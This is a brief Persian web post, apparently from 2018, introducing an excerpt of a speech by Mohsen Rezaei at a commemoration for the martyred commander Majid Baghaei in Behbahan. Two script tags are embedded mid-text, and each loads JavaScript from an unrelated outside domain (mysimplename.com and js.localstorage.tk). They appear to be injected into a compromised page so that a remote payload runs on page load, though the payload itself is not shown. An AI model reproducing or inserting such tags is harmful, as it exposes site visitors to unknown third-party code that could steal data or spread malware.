شهید مجید بقایی به روایت فرمانده


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>گوشه ای از
سخنرانی دکتر محسن رضایی
در یادواره سردارسرلشکر شهید دکتر مجید بقایی
بهمن ماه 1395 - شهرستان بهبهان
<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
2

- 
0
ارسال در 1396/11/7 ساعت 23:48 2018-1-27 22:48:03

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر